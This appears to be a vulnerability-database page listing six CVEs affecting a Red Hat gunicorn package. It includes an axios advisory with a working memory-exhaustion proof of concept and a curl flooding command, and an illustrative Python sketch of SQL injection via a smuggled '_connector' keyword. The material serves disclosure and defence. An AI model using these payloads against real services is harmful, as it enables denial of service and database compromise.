Package details: pkg:rpm/redhat/python3.11-gunicorn@23.0.0-1?arch=el9ap
Next non-vulnerable version: None
Latest non-vulnerable version: None
Risk: 10.0
Vulnerabilities affecting this package (6)
Vulnerability Summary Fixed by
VCID-5ahj-2e48-k3bq
Aliases:
CVE-2025-9909
aap-gateway: Improper Path Validation in Gateway Allows Credential Exfiltration
There are no reported fixed by versions.
VCID-6wx7-16zc-8qck
Aliases:
CVE-2025-9907
event-driven-ansible: Event Stream Test Mode Exposes Sensitive Headers in AAP EDA
There are no reported fixed by versions.
VCID-9uzd-mmyv-mfh4
Aliases:
CVE-2025-64459
GHSA-frmv-pr5f-9mcr
Django vulnerable to SQL injection via _connector keyword argument in QuerySet and Q objects.

An issue was discovered in Django 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. The methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when a suitably crafted dictionary, with dictionary expansion, is passed as the `_connector` argument. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank cyberstan for reporting this issue.

There are no reported fixed by versions.
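The keyword-expansion hazard described above can be illustrated without Django. The sketch below uses an invented `build_where` helper, not Django's internals, to show how `**` expansion of an attacker-controlled dictionary can smuggle in a reserved `_connector` argument whose value lands verbatim in the SQL text:

```python
# Hypothetical helper illustrating the hazard class, not Django's real code:
# a function that reserves a private keyword (_connector) for trusted callers,
# but also accepts user-supplied filters via ** dictionary expansion.
def build_where(_connector="AND", **filters):
    # The connector string is interpolated into the SQL text verbatim,
    # on the assumption that only trusted code ever sets it.
    clauses = [f"{col} = %s" for col in filters]
    return "(" + f" {_connector} ".join(clauses) + ")"

# Intended use: trusted code picks the connector, values stay parameterized.
print(build_where(name="alice", age=30))   # (name = %s AND age = %s)

# If an attacker-controlled dict is expanded with **, the reserved keyword
# rides along and its value is injected directly into the SQL text.
attacker = {"name": "alice", "age": 30, "_connector": "OR 1=1) -- "}
print(build_where(**attacker))             # (name = %s OR 1=1) --  age = %s)
```

Any API of this shape needs to validate its reserved keywords or keep them out of the namespace that user-supplied dictionaries can expand into.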
VCID-aq84-8cnz-byax
Aliases:
CVE-2025-58754
GHSA-4hjh-wcwx-xvwj
Axios is vulnerable to DoS attack through lack of data size check

## Summary

When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength`/`maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.

## Details

The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob. Relevant code from [`httpAdapter`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```

The decoder is in [`lib/helpers/fromDataURI.js`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

```js
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) {
      return new _Blob([buffer], {type: mime});
    }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```

* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.
* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects when `totalResponseBytes` exceeds [`maxContentLength`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.
## PoC

```js
const axios = require('axios');

async function main() {
  const base64Size = 160_000_000; // ~120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;
  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, { responseType: 'arraybuffer' });
  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```

Run with limited heap to force a crash:

```bash
node --max-old-space-size=100 poc.js
```

Since the Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
 1: 0x… node::Abort()
…
```

Mini real-app PoC: a small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows `data:` URLs, for which axios ignores `maxContentLength` and `maxBodyLength` entirely and decodes the payload into memory on Node before streaming, enabling DoS.
```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });

const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent,
  httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req, res) => res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming, but if url is data:, axios fully decodes into memory first (DoS vector).
 */
app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try {
    u = new URL(String(url));
  } catch {
    return res.status(400).json({ error: "invalid url" });
  }

  // Developer allows data: in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;
  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) {
        limiter.end();
        r.data.destroy();
      } else {
        sent += chunk.length;
        limiter.write(chunk);
      }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```

Run this app and send three POST requests:

```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
```

---

## Suggestions

1. **Enforce size limits.** For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.
2. **Stream decoding.** Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

There are no reported fixed by versions.
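The first suggestion, bounding the decoded size before decoding, can be sketched independently of axios. The Python illustration below (the helper name and regex are assumptions for this sketch, not axios code) estimates the decoded size of a `data:` URI from its encoded length and rejects it before any large allocation happens:

```python
import base64
import re

# Illustrative sketch: bound the decoded size of a data: URI *before*
# decoding, instead of materializing the whole payload first.
DATA_URL_RE = re.compile(r"^data:([^;,]*)?(;base64)?,(.*)$", re.DOTALL)

def from_data_uri(uri, max_bytes):
    m = DATA_URL_RE.match(uri)
    if not m:
        raise ValueError("not a data: URI")
    is_base64 = m.group(2) is not None
    body = m.group(3)
    # Base64 encodes 3 bytes into 4 characters, so the decoded size is
    # at most len(body) * 3 / 4; this estimate is O(1) to compute.
    estimated = len(body) * 3 // 4 if is_base64 else len(body)
    if estimated > max_bytes:
        raise ValueError(f"payload ~{estimated} bytes exceeds limit {max_bytes}")
    return base64.b64decode(body) if is_base64 else body.encode()

small = "data:application/octet-stream;base64," + base64.b64encode(b"ok").decode()
print(from_data_uri(small, max_bytes=1024))   # b'ok'

huge = "data:application/octet-stream;base64," + "A" * 1_000_000
try:
    from_data_uri(huge, max_bytes=64 * 1024)
except ValueError as e:
    print("rejected:", e)
```

Because the check runs on the encoded string's length, the oversized payload is refused without ever being decoded into memory.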
VCID-pvw1-t3hh-nyep
Aliases:
CVE-2025-9908
event-driven-ansible: Sensitive Internal Headers Disclosure in AAP EDA Event Streams
There are no reported fixed by versions.
VCID-qatc-a78d-8ufh
Aliases:
CVE-2025-59530
GHSA-47m2-4cr7-mhcw
quic-go: Panic occurs when queuing undecryptable packets after handshake completion

## Summary

A misbehaving or malicious server can trigger an assertion in a quic-go client (and crash the process) by sending a premature HANDSHAKE_DONE frame during the handshake.

## Impact

A misbehaving or malicious server can cause a denial-of-service (DoS) attack on the quic-go client by triggering an assertion failure, leading to a process crash. This requires no authentication and can be exploited during the handshake phase. Observed in the wild with certain server implementations (e.g. Solana's Firedancer QUIC).

## Affected Versions

- All versions prior to v0.49.1 (for the 0.49 branch)
- Versions v0.50.0 to v0.54.0 (inclusive)
- Fixed in v0.49.1, v0.54.1, and v0.55.0 onward

Users are recommended to upgrade to the latest patched version in their respective maintenance branch, or to v0.55.0 or later.

## Details

For a regular 1-RTT handshake, QUIC uses three sets of keys to encrypt / decrypt QUIC packets:

- Initial keys (derived from a static key and the connection ID)
- Handshake keys (derived from the client's and server's key shares in the TLS handshake)
- 1-RTT keys (derived when the TLS handshake finishes)

On the client side, Initial keys are discarded when the first Handshake packet is sent. Handshake keys are discarded when the server's HANDSHAKE_DONE frame is received, as specified in Section 4.9.2 of RFC 9001. Crucially, Initial keys are always dropped before Handshake keys in a standard handshake.

Due to packet reordering, it is possible to receive a packet with a higher encryption level before the key for that encryption level has been derived. For example, the server's Handshake packets (containing, among others, the TLS certificate) might arrive before the server's Initial packet (which contains the TLS ServerHello). In that case, the client queues the Handshake packets and decrypts them as soon as it has processed the ServerHello and derived the Handshake keys.

After completion of the handshake, Initial and Handshake packets are no longer needed and are dropped. quic-go implements an [assertion](https://github.com/quic-go/quic-go/blob/v0.55.0/connection.go#L2682-L2685) that no packets remain queued after completion of the handshake. A misbehaving or malicious server can trigger this assertion, and thereby cause a panic, by sending a HANDSHAKE_DONE frame before actually completing the handshake. In that case, Handshake keys would be dropped before Initial keys. This can only happen if the server implementation is misbehaving: the server can only complete the handshake after receiving the client's TLS Finished message (which is sent in Handshake packets).

## The Fix

quic-go needs to be able to handle misbehaving server implementations, including those that prematurely send a HANDSHAKE_DONE frame. We now discard Initial keys when receiving a HANDSHAKE_DONE frame, thereby correctly handling premature HANDSHAKE_DONE frames. The fix was implemented in https://github.com/quic-go/quic-go/pull/5354.

There are no reported fixed by versions.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|------|-------|--------|---------------|--------|------------------------|
| 2026-04-01T13:37:07.727802+00:00 | RedHat Importer | Affected by | VCID-aq84-8cnz-byax | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json | 38.0.0 |
| 2026-04-01T13:36:41.468640+00:00 | RedHat Importer | Affected by | VCID-5ahj-2e48-k3bq | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9909.json | 38.0.0 |
| 2026-04-01T13:36:40.434741+00:00 | RedHat Importer | Affected by | VCID-pvw1-t3hh-nyep | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9908.json | 38.0.0 |
| 2026-04-01T13:36:39.393550+00:00 | RedHat Importer | Affected by | VCID-6wx7-16zc-8qck | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9907.json | 38.0.0 |
| 2026-04-01T13:36:00.734230+00:00 | RedHat Importer | Affected by | VCID-qatc-a78d-8ufh | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-59530.json | 38.0.0 |
| 2026-04-01T13:35:16.872008+00:00 | RedHat Importer | Affected by | VCID-9uzd-mmyv-mfh4 | https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64459.json | 38.0.0 |